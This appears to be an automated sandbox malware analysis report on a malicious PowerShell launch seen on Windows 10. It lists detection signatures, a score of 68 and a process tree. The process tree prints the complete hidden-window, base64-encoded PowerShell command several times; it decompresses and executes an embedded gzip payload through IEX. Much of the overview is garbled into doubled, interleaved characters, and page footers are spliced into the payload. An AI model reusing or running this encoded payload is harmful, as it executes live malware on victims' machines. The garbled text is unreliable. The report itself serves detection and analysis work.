Automated Malware Analysis Report

Home , PowerShell

ID: 278521 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 09:26:59 Date: 27/08/2020 Version: 29.0.0 Ocean Jasper Table of Contents

Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 6 Yara Overview 6 Sigma Overview 6 System Summary: 6 Signature Overview 6 E-Banking Fraud: 6 System Summary: 6 Data Obfuscation: 7 HIPS / PFW / Operating System Protection Evasion: 7 Mitre Att&ck Matrix 7 Behavior Graph 7 Screenshots 8 Thumbnails 8 Antivirus, Machine Learning and Genetic Malware Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 9 URLs 9 Domains and IPs 9 Contacted Domains 10 Contacted IPs 10 General Information 10 Simulations 10 Behavior and APIs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 11 JA3 Fingerprints 11 Dropped Files 11 Created / dropped Files 11 Static File Info 11 No static file info 11 Network Behavior 11 Code Manipulations 12 Statistics 12 Behavior 12 System Behavior 12 Analysis Process: cmd.exe PID: 6648 Parent PID: 4912 12 General 12 File Activities 13 Analysis Process: conhost.exe PID: 6660 Parent PID: 6648 13 General 14 Analysis Process: cmd.exe PID: 6712 Parent PID: 6648 14 General 14 File Activities 15

Copyright null 2020 Page 2 of 18 Analysis Process: powershell.exe PID: 6724 Parent PID: 6712 15 General 15 File Activities 16 File Created 17 File Written 17 File Read 17 Disassembly 18

Overview

General Information Detection Signatures Classification

Analysis ID: 278521 Maallliiicciiioouuss eennccrrryyppttteedd PPoowweerrrsshheellllll ccoom… Most interesting Screenshot: EMEnnacclirrrcyyipoptutteesdd e ppnoocwwryeeprrrstsehhdee lPlllll cocmweddrllliisinnheee olol ppctttoiiioomnn…

SESiiniggcmryaap dtdeeedttte epccotttewedde::: r Mshaaellliiliclc iciioomuusds l BiBnaaess oeep66t44io EEn…

Ransomware Sigma detected: Malicious Base64 E SSiiiggmaa ddeettteeccttteedd::: SMSuuasslippciiicociiiuoosuu ssB EaEsnnecc6oo4dd eeE… Miner Spreading

SSuiugssmppiaicc iidooeuutsse pcptooewwde:e rSrssuhhseeplllli ccioomusm Eaanncddo ldliinneee mmaallliiiccciiioouusss SSuussppiiicciiioouuss ppoowweerrrsshheellllll ccoommaanndd llliiinnee… malicious

Evader Phishing

sssuusssppiiiccciiioouusss VSVeuerrsryyp lillocoinnoggu scc oopmowmeaarnsndhd e llliilinln ece o fffomouumnndadnd line suspicious

cccllleeaann

clean CVCoeonrnyttta aloiiinnnssg c ccaaoppmaabmbiiillaliiitttniiieedss l tittnooe dd feeotttueencctdtt vviiirrrtttuuaa… Exploiter Banker

CCoonntttaaiiinnss llclooannpgga sbsllileleieteieppss t(((o>> ==d e 33t e mcitiin nv)))irtua

Spyware Trojan / Bot CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo… Adware

ECEnrneaaabbtllleess add eepbbruougcge ppsrrrsiiiv viiinilllee sggueesspended mo Score: 68 Range: 0 - 100 MEnaaayyb sslellleesee dppe (((beeuvvgaa sspiiivrvieve i llloeoogopepss))) tttoo hhiiinnddeerrr …

Whitelisted: false QMuaueyerr risiieeless e ttthphe e( e vvvooalllusumivee liiionnofffooprrrsm) aatotttiii oohnnin (((dnneaarm … Confidence: 100% VQVeeurrreyyr illleoosnn ggth ccem vddollliiiunnmee eoo ppintttiiifoonnr m fffooauutninoddn,,, (ttthnhiaiissm…

Very long cmdline option found, this

Startup

System is w10x64 cmd.exe (PID: 6648 cmdline: cmd /C 'C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMA dAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A ZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMA WQB6ADUAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4AGsA bQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBTADYA UgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQBIAG0A RQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVABsAGQAVQBMAHAA ZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQBqAGYA UQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATABNAHUA SQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQAQQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsA bQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4AMwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYA OAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEA

bwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8A OAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAA MwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAA VwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIA awBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYA egBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcA VQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkA SQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUA SQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMA cABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMA UgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkA MABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUA UABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwA NwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoA SQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoA aQBzAGwAYwBxAHQARQBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIA bQA1AFkAYQAxAHIAdQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEA RgBRAGIAcgB0ADEAWgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEA WQBiADkAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIA bQB1AFkALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUA bgBZADUAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsA bwB5ADIASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzADcAU gBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2AFcAS gB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNADMAS wAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6AEQAb gBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0AFgAW gBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBUAGcAY gBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAWQBSAGoATwBOADAAUwBFADYAZ wB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkARABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQ wBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIATgAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQ wBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAcwBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAe gBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcANQBFAHgANgBxAEgANgBPAEQAVwBRADEAUgArAGcAY wBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAVgA2AHEAKwBCAFgAZABVADAATABoAEcAVgBUAG8Ac wBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0AT CopyrigwhtB niAuGllo 2A0Z2Q0BjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAa Page 4 of 18 wBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAa QBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4AT QBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAG MAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG 4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AE MAWQB6ADUAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBw AHoAbAB4AGsAbQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBH AHMAeQBTADYAUgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcgBw AEoAOQBIAG0ARQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVABs AGQAVQBMAHAAZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsARgBYAE0AOQAr AGoAUQBqAGYAUQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcAZwBvAEcAcgBn AHEATABNAHUASQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQAQQAxAE8AeABhAFMAcgBvAHEATwA3 ADIAcwBHACsAbQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4AMwAvAGMAVAA1AFgAdQBxADcAWgBo AHcAaQBtADYAOAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4 AEQANgBhADEAbwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBL AGsAQQBjAG8AOAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJ AEwAbQBSAFAAMwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBS AHgATABPAHAAVwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBj ADgAcABNAGIAawBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABn AGoAOQBxAGYAegBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBt AEkAbgAxAHcAVQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBl AE4ASABaADkASQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABY AEkAbwAwAEUASQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1 AGkAZgBFAEMAcABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBv AEwAMgBJAFMAUgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBE AHIAcABRAGkAMABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABu AE0AbwAwAGUAUABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBK AG8AbwBiAEwANwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1 AHgAbQAxAHoASQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0 AHkARwBWAGoAaQBzAGwAYwBxAHQARQBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQ BqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIAdQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASg BtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEAWgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUA BOAC8ARgBmAHoAeQArAGEAWQBiADkAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQ BhAFcAVgB0AHoALwByAFIAbQB1AFkALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQw BTAFMAbgBEAEgAKwBsAHUAbgBZADUAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZw BJADkAcgB6AEsAegB0AGsAbwB5ADIASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB 6AFAAQQBoADUAUQAzADcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOAB IAC8AawB2ADMAbQA2AFcASgB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwB vAGsAdgA2AGUAbABNADMASwAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgA zAEMAcABXAHUAWQB6AEQAbgBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgB wAHQAawA4AC8AYgA0AFgAWgBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQB UAEYAZQBPAHMAdwBUAGcAYgBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAWQB SAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkARABDAGIAbABaAG4AZwA rAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIATgAxAHIAQgAvAE4ANQB kAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAcwBFAGIAcgBFAG8AWgB mAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcANQBFAHgANgBxAEgANgB PAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAVgA2AHEAKwBCAFgAZAB VADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAEEAQQA9ACIAKQApADsASQB FAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgB DAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQB wAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA MD5: F3BDBE3BB6F734E357235F4D5898582D) powershell.exe (PID: 6724 cmdline: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8Acg B5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMA SQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6AD UAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4 AGsAbQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBT ADYAUgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcg BwAEoAOQBIAG0ARQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVA BsAGQAVQBMAHAAZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsA RgBYAE0AOQArAGoAUQBqAGYAUQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcA ZwBvAEcAcgBnAHEATABNAHUASQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQAQQAxAE 8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsAbQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4AMwAvAG MAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYAOAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBx ACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEAbwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQ BCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8AOAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEA dAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAAMwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkA NABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAAVwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMA WAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIAawBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoA MAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYAegBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMA WQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcAVQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYA 